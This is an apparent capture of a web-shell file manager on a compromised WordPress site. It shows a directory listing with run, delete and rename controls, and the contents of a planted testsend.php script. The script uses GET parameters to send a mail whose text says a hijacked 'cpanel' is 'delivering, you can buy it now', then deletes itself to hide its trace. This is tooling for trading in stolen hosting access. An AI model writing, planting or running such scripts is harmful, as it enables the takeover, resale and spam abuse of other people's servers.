at path:
ROOT
/
testsend.php
run:
R
W
Run
3e7c59
DIR
2026-08-03 09:03:11
R
W
Run
wp-admin
DIR
2026-08-03 09:03:10
R
W
Run
wp-content
DIR
2026-08-03 09:03:11
R
W
Run
wp-includes
DIR
2026-08-03 09:03:10
R
W
Run
.htaccess
1.13 KB
2025-04-28 09:03:11
R
W
Run
index.php0
416 By
2024-05-22 09:03:10
R
W
Run
Delete
Rename
robots.txt
355 By
2023-12-12 09:03:11
R
W
Run
testsend.php
316 By
2026-08-12 09:05:25
R
W
Run
Delete
Rename
error_log
up
📄
testsend.php
Save
<?php error_reporting(0); if($_GET["sendemail"]){ $test = mail($_GET["sendemail"],"Result cpanel Test - ".$_GET["id"],"This cpanel with id - ".$_GET["id"]." is delivering , you can buy it now."); if(!$test) print "bad"; else print "<b>sendok - [".$_GET["sendemail"]."] - ".$_GET["id"]."</b>"; unlink(__FILE__); } ?>